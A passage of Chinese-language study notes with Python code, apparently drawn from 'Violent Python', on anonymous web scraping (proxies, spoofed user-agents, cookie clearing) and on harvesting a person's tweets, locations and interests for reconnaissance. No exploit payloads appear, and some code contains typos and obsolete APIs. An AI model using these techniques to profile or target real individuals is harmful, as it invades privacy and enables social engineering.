    <span class="n">source_code</span> <span class="o">=</span> <span class="n">page</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="n">source_code</span><span class="p">)</span>
<span class="n">view_page</span><span class="p">(</span><span class="s">"http://www.syngress.com/"</span><span class="p">)</span>
</code></pre></div></div>

<p>Mechanize 提供了状态化编程（stateful programming）和方便的 HTML 表单填写，便于解析和处理诸如 “HTTP-Equiv” 和刷新之类的命令。此外，它还自带了不少能让你保持匿名状态的函数。</p>

<h3 id="匿名性使用代理服务器user-agent-及-cookie">匿名性——使用代理服务器、User-Agent 及 Cookie</h3>

<p>网站有多种方法能够唯一标识网页的访问者。Web 服务器记录发起网页请求的 IP 是标识用户的第一种方式。Python 也可以连接代理服务器，这能给程序增加匿名性。Mechanize 的 Browser 类中有一个属性，即程序能用它指定一个代理服务器。MyCurdy 在 <a href="http://rmccurdy.com/scripts/proxy/good.txt">http://rmccurdy.com/scripts/proxy/good.txt</a> 中维护着一个可用代理的列表。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">mechanize</span>
<span class="k">def</span> <span class="nf">test_proxy</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">proxy</span><span class="p">):</span>
    <span class="n">browser</span> <span class="o">=</span> <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">()</span>
    <span class="n">browser</span><span class="p">.</span><span class="n">set_proxies</span><span class="p">(</span><span class="n">proxy</span><span class="p">)</span>
    <span class="n">page</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="n">source_code</span> <span class="o">=</span> <span class="n">page</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="n">source_code</span><span class="p">)</span>
<span class="n">url</span> <span class="o">=</span> <span class="s">"http://ip.nefsc.noaa.gov/"</span>
<span class="n">hide_me_proxy</span> <span class="o">=</span> <span class="p">{</span><span class="s">"http"</span><span class="p">:</span> <span class="s">"216.155.139.115:3128"</span><span class="p">}</span>
<span class="n">test_proxy</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">hide_me_proxy</span><span class="p">)</span>
</code></pre></div></div>

<p>浏览器现在有一层匿名性了，但网站还会使用浏览器提供的 <code class="language-plaintext highlighter-rouge">user-agent</code> 字符串作为唯一标识用户的另一种方法。在正常情况下，<code class="language-plaintext highlighter-rouge">user-agent</code> 字符串可以让网站获知用户使用的是哪种浏览器这一重要信息，同时这个字段还记录了内核版本、浏览器版本，以及其他一些关于用户的详细信息。恶意网站利用这些信息根据不同的浏览器版本发送不同的漏洞利用代码，而其他一些网站则利用这些信息区分那些躲在 NAT 后面的局域网里的永不。</p>

<p>Mechanize 能像添加代理那样，轻松修改 <code class="language-plaintext highlighter-rouge">user-agent</code>，<a href="http://www.useragentstring.com/pages/useragentstring.php">网站</a> 提供了大量有效的 <code class="language-plaintext highlighter-rouge">user-agent</code> 字符串。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">mechanize</span>
<span class="k">def</span> <span class="nf">test_user_agent</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">user_agent</span><span class="p">):</span>
    <span class="n">browser</span> <span class="o">=</span> <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">()</span>
    <span class="n">browser</span><span class="p">.</span><span class="n">addheaders</span> <span class="o">=</span> <span class="n">user_agent</span>
    <span class="n">page</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="n">source_code</span> <span class="o">=</span> <span class="n">page</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="n">source_code</span><span class="p">)</span>
<span class="n">url</span> <span class="o">=</span> <span class="s">"http://whatismyuseragent.dotdoh.com/"</span>
<span class="n">user_agent</span> <span class="o">=</span> <span class="p">[(</span><span class="s">"User-agent"</span><span class="p">,</span> <span class="s">"Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) ..."</span><span class="p">)]</span>
<span class="n">test_user_agent</span><span class="p">(</span><span class="n">url</span><span class="p">,</span><span class="n">user_agnet</span><span class="p">)</span>
</code></pre></div></div>

<p>网站还会给 Web 浏览器发送 cookie，cookie 中记录了一些能唯一标识用户的信息，网站用它来验证用户之前是否访问/登录过该网站。为了防止这种情况发生，在执行匿名操作之前一定要清除浏览器中的 cookie。有一个库名为 cookielib，其中含有几个不同的能用来处理 cookie 的容器。这里使用的是一个能把各个不同的 cookie 保存到磁盘中的容器。该功能允许用户在收到 cookie 之后，不必把它返回给网站，并能查看其中的内容</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">mechanize</span>
<span class="kn">import</span> <span class="nn">cookielib</span>
<span class="k">def</span> <span class="nf">print_cookies</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="n">browser</span> <span class="o">=</span> <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">()</span>
    <span class="n">cookie_jar</span> <span class="o">=</span> <span class="n">cookielib</span><span class="p">.</span><span class="n">LWPCookieJar</span><span class="p">()</span>
    <span class="n">browser</span><span class="p">.</span><span class="n">set_cookiejar</span><span class="p">(</span><span class="n">cookie_jar</span><span class="p">)</span>
    <span class="n">page</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">cookie</span> <span class="ow">in</span> <span class="n">cookie_jar</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">cookie</span><span class="p">)</span>
<span class="n">url</span> <span class="o">=</span> <span class="s">"http://www.syngress.com/"</span>
<span class="n">print_cookies</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="把代码集成在-python-类的-anonbrowser-中">把代码集成在 Python 类的 AnonBrowser 中</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">mechanize</span><span class="p">,</span> <span class="n">cookielib</span><span class="p">,</span> <span class="n">random</span>
<span class="k">class</span> <span class="nc">AnonBrowser</span><span class="p">(</span><span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">proxies</span><span class="o">=</span><span class="p">[],</span> <span class="n">user_agents</span><span class="o">=</span><span class="p">[]):</span>
        <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">.</span><span class="n">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">set_handle_robots</span><span class="p">(</span><span class="bp">False</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">proxies</span> <span class="o">=</span> <span class="n">proxies</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">user_agents</span> <span class="o">=</span> <span class="n">user_agents</span> <span class="o">+</span> <span class="p">[</span><span class="s">"Mozilla/4.0 FireFox/6.01"</span><span class="p">,</span> <span class="s">"ExactSearch"</span><span class="p">,</span> <span class="p">...]</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">cookie_jar</span> <span class="o">=</span> <span class="n">cookielib</span><span class="p">.</span><span class="n">LWPCookieJar</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">set_cookiejar</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cookie_jar</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">anonymize</span><span class="p">()</span>
        
   	<span class="k">def</span> <span class="nf">clear_cookies</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
		<span class="bp">self</span><span class="p">.</span><span class="n">cookie_jar</span> <span class="o">=</span> <span class="n">cookielib</span><span class="p">.</span><span class="n">LWPCookieJar</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">set_cookiejar</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cookie_jar</span><span class="p">)</span>
        
	<span class="k">def</span> <span class="nf">change_user_agent</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="n">index</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">user_agents</span><span class="p">))</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">addheaders</span> <span class="o">=</span> <span class="p">[(</span><span class="s">"User-agent"</span><span class="p">,</span> <span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">user_agents</span><span class="p">[</span><span class="n">index</span><span class="p">]))]</span>
        
	<span class="k">def</span> <span class="nf">change_proxy</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">proxies</span><span class="p">:</span>
            <span class="n">index</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">proxies</span><span class="p">))</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">set_proxies</span><span class="p">({</span><span class="s">"http"</span><span class="p">:</span> <span class="bp">self</span><span class="p">.</span><span class="n">proxies</span><span class="p">[</span><span class="n">index</span><span class="p">]})</span>
            
	<span class="k">def</span> <span class="nf">anonymize</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">sleep</span><span class="o">=</span><span class="bp">False</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">clear_cookies</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">change_user_agent</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">change_proxy</span><span class="p">()</span>
        <span class="k">if</span> <span class="n">sleep</span><span class="p">:</span>
            <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">60</span><span class="p">)</span>
</code></pre></div></div>

<p>anoymize 函数还有一个能让进程休眠 60s 的参数，这会增加使用了匿名化方法前后两次请求在服务器日志中出现的时间间隔</p>

<h2 id="用-anonbrowser-抓取更多的-web-页面">用 AnonBrowser 抓取更多的 Web 页面</h2>

<h2 id="用-beautiful-soup-解析-href-链接">用 Beautiful Soup 解析 href 链接</h2>

<p>若要把目标网页上的链接全都分析出来，有两种选择：一种是使用正则表达式对 HTML 代码做搜索和替换操作，另一种是使用一款名为 BeautifulSoup 的强大的第三方库。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">AnonBrowser</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">BeautifulSoup</span> <span class="kn">import</span> <span class="n">BeautifulSoup</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">optparser</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="k">def</span> <span class="nf">print_links</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="n">ab</span> <span class="o">=</span> <span class="n">AnonBrowser</span><span class="p">()</span>
    <span class="n">ab</span><span class="p">.</span><span class="n">anonymize</span><span class="p">()</span>
    <span class="n">page</span> <span class="o">=</span> <span class="n">ab</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="n">html</span> <span class="o">=</span> <span class="n">page</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Printing Links From Regex."</span><span class="p">)</span>
        <span class="n">link_finder</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="s">'href="(.*?)"'</span><span class="p">)</span>
        <span class="n">links</span> <span class="o">=</span> <span class="n">link_finder</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="n">html</span><span class="p">)</span>
        <span class="k">for</span> <span class="n">link</span> <span class="ow">in</span> <span class="n">links</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="n">link</span><span class="p">)</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>
   	<span class="k">try</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Printing Links From BeautifulSoup."</span><span class="p">)</span>
        <span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">html</span><span class="p">)</span>
        <span class="n">links</span> <span class="o">=</span> <span class="n">soup</span><span class="p">.</span><span class="n">findAll</span><span class="p">(</span><span class="n">name</span><span class="o">=</span><span class="s">'a'</span><span class="p">)</span>
        <span class="k">for</span> <span class="n">link</span> <span class="ow">in</span> <span class="n">links</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">link</span><span class="p">.</span><span class="n">has_key</span><span class="p">(</span><span class="s">'href'</span><span class="p">):</span>
                <span class="k">print</span><span class="p">(</span><span class="n">link</span><span class="p">[</span><span class="s">"href"</span><span class="p">])</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>        
</code></pre></div></div>

<h3 id="用-beautifulsoup-映射图像">用 BeautifulSoup 映射图像</h3>

<p>BeautifulSoup 允许我们能在任何 HTML 对象中找出所有的 “IMG” 标签，然后 browser 对象就能下载图片，并将其以二进制文件的形式保存到本地硬盘中。</p>

<h2 id="研究调查发现">研究、调查、发现</h2>

<h3 id="用-python-与谷歌-api-交互">用 Python 与谷歌 API 交互</h3>

<p>谷歌提供了一个应用程序编程接口（API），它让程序员能执行查询操作，获取结果，而不必使用和精通“正常”的谷歌页面。目前谷歌有两个 API，一个简化版的和一个完整版的，使用完整版的 API 需要拥有开发者密钥。简化版的 API 每天仍能进行相当数量的查询，每次搜索能得到约 30 个结果。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">urllib</span>
<span class="kn">from</span> <span class="nn">AnonBrowser</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">google</span><span class="p">(</span><span class="n">search_term</span><span class="p">):</span>
    <span class="n">ab</span> <span class="o">=</span> <span class="n">AnonBrowser</span><span class="p">()</span>
    <span class="n">search_term</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">quote_plus</span><span class="p">(</span><span class="n">search_term</span><span class="p">)</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">ab</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"http://ajax.googleapis.com/ajax/services/searchweb?v=1.0&amp;q={}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">search_term</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="n">response</span><span class="p">.</span><span class="n">read</span><span class="p">())</span>
<span class="n">google</span><span class="p">(</span><span class="s">"Boondock Saint"</span><span class="p">)</span>
</code></pre></div></div>

<p>响应的数据是 JSON 格式的</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">json</span>
<span class="n">json</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>
</code></pre></div></div>

<p>来编写一个不带任何额外方法的类保存数据，这将使访问各个字段变得更加容易，而不必专门为获取信息而特意去临时解析三层词典。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">urllib</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">from</span> <span class="nn">AnonBrowser</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">class</span> <span class="nc">GoogleResult</span><span class="p">:</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">title</span><span class="p">,</span> <span class="n">text</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">title</span> <span class="o">=</span> <span class="n">title</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="n">text</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">url</span> <span class="o">=</span> <span class="n">url</span>
   	<span class="k">def</span> <span class="nf">__repr__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
		<span class="k">return</span> <span class="bp">self</span><span class="p">.</span><span class="n">title</span>
    
<span class="k">def</span> <span class="nf">google</span><span class="p">(</span><span class="n">search_term</span><span class="p">):</span>
    <span class="n">ab</span> <span class="o">=</span> <span class="n">AnonBrowser</span><span class="p">()</span>
    <span class="n">search_term</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">quote_plus</span><span class="p">(</span><span class="n">search_term</span><span class="p">)</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">ab</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"..."</span><span class="p">)</span>
    <span class="n">objects</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>
    <span class="n">results</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">result</span> <span class="ow">in</span> <span class="n">objects</span><span class="p">[</span><span class="s">"responseData"</span><span class="p">][</span><span class="s">"results"</span><span class="p">]:</span>
        <span class="n">url</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"url"</span><span class="p">]</span>
        <span class="n">title</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"titleNoFormatting"</span><span class="p">]</span>
        <span class="n">text</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"content"</span><span class="p">]</span>
        <span class="n">new_gr</span> <span class="o">=</span> <span class="n">GoogleResult</span><span class="p">(</span><span class="n">title</span><span class="p">,</span> <span class="n">text</span><span class="p">,</span> <span class="n">url</span><span class="p">)</span>
        <span class="n">results</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">new_gr</span><span class="p">)</span>
   	<span class="k">return</span> <span class="n">results</span>
</code></pre></div></div>

<h3 id="用-python-解析-tweets-个人主页">用 Python 解析 Tweets 个人主页</h3>

<p>和谷歌一样，Twitter 也给开发者提供了 API。相关文档位于<a href="https://dev.twitter.com/docs">网址</a></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">json</span><span class="p">,</span> <span class="n">urllib</span>
<span class="kn">from</span> <span class="nn">AnonBrowser</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">class</span> <span class="nc">ReconPerson</span><span class="p">:</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">first_name</span><span class="p">,</span> <span class="n">last_name</span><span class="p">,</span> <span class="n">job</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">social_media</span><span class="o">=</span><span class="p">{}):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">first_name</span> <span class="o">=</span> <span class="n">first_name</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">last_name</span> <span class="o">=</span> <span class="n">last_name</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">job</span> <span class="o">=</span> <span class="n">job</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">social_media</span> <span class="o">=</span> <span class="n">social_media</span>
        
	<span class="k">def</span> <span class="nf">__repr__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="s">"{} {} has job {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">first_name</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">last_name</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">job</span><span class="p">)</span>
    
    <span class="k">def</span> <span class="nf">get_social</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">media_name</span><span class="p">):</span>
        <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">social_media</span><span class="p">.</span><span class="n">has_key</span><span class="p">(</span><span class="n">media_name</span><span class="p">):</span>
            <span class="k">return</span> <span class="bp">self</span><span class="p">.</span><span class="n">social_media</span><span class="p">[</span><span class="n">media_name</span><span class="p">]</span>
        <span class="k">return</span> <span class="bp">None</span>
    
	<span class="k">def</span> <span class="nf">query_twitter</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">query</span><span class="p">):</span>
        <span class="n">query</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">quote_plus</span><span class="p">(</span><span class="n">query</span><span class="p">)</span>
        <span class="n">results</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
        <span class="n">browser</span> <span class="o">=</span> <span class="n">AnonBrowser</span><span class="p">()</span>
        <span class="n">response</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"http://search.twitter.com/search.json?q={}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">query</span><span class="p">))</span>
        <span class="n">json_objects</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>
        <span class="k">for</span> <span class="n">result</span> <span class="ow">in</span> <span class="n">json_objects</span><span class="p">[</span><span class="s">"results"</span><span class="p">]:</span>
            <span class="n">new_result</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">()</span>
            <span class="n">new_result</span><span class="p">[</span><span class="s">"name"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"name"</span><span class="p">]</span>
            <span class="n">new_result</span><span class="p">[</span><span class="s">"geo"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"geo"</span><span class="p">]</span>
            <span class="n">new_result</span><span class="p">[</span><span class="s">"tweet"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"text"</span><span class="p">]</span>
            <span class="n">results</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">new_result</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">results</span>
<span class="n">ap</span> <span class="o">=</span> <span class="n">ReconPerson</span><span class="p">(</span><span class="s">"Boondock"</span><span class="p">,</span> <span class="s">"Saint"</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">ap</span><span class="p">.</span><span class="n">query_twitter</span><span class="p">(</span><span class="s">"from:username since:2010-01-01 include:retweets"</span><span class="p">))</span>
</code></pre></div></div>

<h3 id="从推文中提取地理位置信息">从推文中提取地理位置信息</h3>

<p>许多 Twitter 用户遵循一个公式来撰写他们的推文与世界分享。通常情况下，这个公式为：【该推文是直接推给哪些推特用户的】+【推文的正文，其中常会含有简短的 URL】+【hash 标签】。使用恶意的分割法时，这个公式应该写成：【关注该用户的人，他们信任来自该用户的通信的概率会比较大】+【这个人感兴趣的链接或主题，他可能会对该话题中的其他内容感兴趣】+【这个人可能想要进一步了解的大致方向或主题】。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">urllib</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">from</span> <span class="nn">AnonBrowser</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">get_tweets</span><span class="p">(</span><span class="n">handle</span><span class="p">):</span>
    <span class="n">query</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">quote_plus</span><span class="p">(</span><span class="s">"from:{} since:2009-01-01 include:retweets"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">handle</span><span class="p">))</span>
    <span class="n">tweets</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="n">browser</span> <span class="o">=</span> <span class="n">AnonBrowser</span><span class="p">()</span>
    <span class="n">browser</span><span class="p">.</span><span class="n">anonymize</span><span class="p">()</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"http://search.twitter.com/search.json?q={}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">query</span><span class="p">))</span>
    <span class="n">json_objects</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">result</span> <span class="ow">in</span> <span class="n">json_objects</span><span class="p">[</span><span class="s">"results"</span><span class="p">]:</span>
        <span class="n">new_result</span> <span class="o">=</span> <span class="p">{}</span>
        <span class="n">new_result</span><span class="p">[</span><span class="s">"from_user"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"from_user_name"</span><span class="p">]</span>
        <span class="n">new_result</span><span class="p">[</span><span class="s">"geo"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"geo"</span><span class="p">]</span>
        <span class="n">new_result</span><span class="p">[</span><span class="s">"tweet"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"text"</span><span class="p">]</span>
        <span class="n">tweets</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">new_result</span><span class="p">)</span>
	<span class="k">return</span> <span class="n">tweets</span>

<span class="k">def</span> <span class="nf">load_cities</span><span class="p">(</span><span class="n">city_file</span><span class="p">):</span>
    <span class="n">cities</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="nb">open</span><span class="p">(</span><span class="n">city_file</span><span class="p">).</span><span class="n">readlines</span><span class="p">():</span>
        <span class="n">city</span> <span class="o">=</span> <span class="n">line</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">).</span><span class="n">lower</span><span class="p">()</span>
        <span class="n">cities</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">city</span><span class="p">)</span>
   	<span class="k">return</span> <span class="n">cities</span>

<span class="k">def</span> <span class="nf">twitter_locate</span><span class="p">(</span><span class="n">tweets</span><span class="p">,</span> <span class="n">cities</span><span class="p">):</span>
    <span class="n">locations</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="n">loc_cnt</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">city_cnt</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">tweets_text</span> <span class="o">=</span> <span class="nb">str</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">tweet</span> <span class="ow">in</span> <span class="n">tweets</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">tweet</span><span class="p">[</span><span class="s">"geo"</span><span class="p">]</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
            <span class="n">locations</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">tweet</span><span class="p">[</span><span class="s">"geo"</span><span class="p">])</span>
            <span class="n">loc_cnt</span> <span class="o">+=</span> <span class="mi">1</span>
            <span class="n">tweets_text</span> <span class="o">+=</span> <span class="n">tweet</span><span class="p">[</span><span class="s">"tweet"</span><span class="p">].</span><span class="n">lower</span><span class="p">()</span>
	<span class="k">for</span> <span class="n">city</span> <span class="ow">in</span> <span class="n">cities</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">city</span> <span class="ow">in</span> <span class="n">tweets_text</span><span class="p">:</span>
            <span class="n">locations</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">city</span><span class="p">)</span>
            <span class="n">city_cnt</span> <span class="o">+=</span> <span class="mi">1</span>
	<span class="k">print</span><span class="p">(</span><span class="s">"[+] Found {} locations via Twitter API and {} locations from text search."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">loc_cnt</span><span class="p">,</span> <span class="n">city_cnt</span><span class="p">))</span>
</code></pre></div></div>

<h3 id="用正则表达式解析-twitter-用户的兴趣爱好">用正则表达式解析 Twitter 用户的兴趣爱好</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">find_interests</span><span class="p">(</span><span class="n">tweets</span><span class="p">):</span>
    <span class="n">interests</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">tweet</span> <span class="ow">in</span> <span class="n">tweets</span><span class="p">:</span>
